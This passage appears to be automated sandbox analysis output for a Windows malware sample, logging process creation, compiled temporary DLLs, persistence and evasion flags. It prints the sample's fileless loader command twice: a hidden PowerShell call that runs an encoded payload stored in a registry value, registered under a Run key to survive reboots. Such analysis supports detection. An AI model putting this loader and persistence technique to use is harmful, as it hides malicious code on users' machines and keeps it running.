Source: Yara match File source: 0000001E.00000000.398031216863.0000000003090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.398540029025.0000000003230000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.398480532296.0000000003230000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $OBITUARY=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Billiond5;powershell.exe -windowstyle hidden -encodedcommand($OBITUARY)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand 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
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_070AF658 pushad ; iretd 4_2_070AF659
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F20700 pushad ; iretd 4_2_07F20701
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F20880 pushfd ; iretd 4_2_07F20881
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F7A4FF pushad ; retn 0007h 4_2_07F7A512
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F7CC37 pushfd ; retn 0007h 4_2_07F7CC42
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F81853 push 2407C3DFh; iretd 4_2_07F8185D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC228B push eax; mov dword ptr [esp], edx 4_2_07FC2294
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC7F10 pushfd ; ret 4_2_07FC819A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC2603 push edi; ret 4_2_07FC260A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC35F7 pushad ; ret 4_2_07FC35F9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC8368 pushfd ; ret 4_2_07FC836A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC836B pushfd ; ret 4_2_07FC8372
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC2311 push esi; ret 4_2_07FC2312
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC8313 pushfd ; ret 4_2_07FC831A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC230D push esi; ret 4_2_07FC230E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC2308 push edi; ret 4_2_07FC230A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC82D9 pushfd ; ret 4_2_07FC82DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC82C1 pushfd ; ret 4_2_07FC82C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC82A0 pushfd ; ret 4_2_07FC82A2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC82A3 pushfd ; ret 4_2_07FC82AA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC2281 push esi; ret 4_2_07FC2282
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC321B pushad ; ret 4_2_07FC3222
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC3059 pushad ; ret 4_2_07FC305A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC305B pushad ; ret 4_2_07FC3062
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC2FF8 pushad ; ret 4_2_07FC2FFA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC2EE1 pushad ; ret 4_2_07FC2EE2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC1DA8 push esp; ret 4_2_07FC1DE2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08513B70 push eax; mov dword ptr [esp], edx 4_2_08513B74
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08513D51 push eax; mov dword ptr [esp], edx 4_2_08513D64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08513D60 push eax; mov dword ptr [esp], edx 4_2_08513D64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_0851CE40 push eax; mov dword ptr [esp], edx 4_2_0851CE6C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rf0jcwxf.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wxgbxjsa.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ginqqgem.cmdline

Persistence and Installation Behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\ginqqgem.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\rf0jcwxf.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\wxgbxjsa.dll

Boot Survival

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Maaneds3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Maaneds3 c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $OBITUARY=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Billiond5;powershell.exe -windowstyle hidden -encodedcommand($OBITUARY)

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
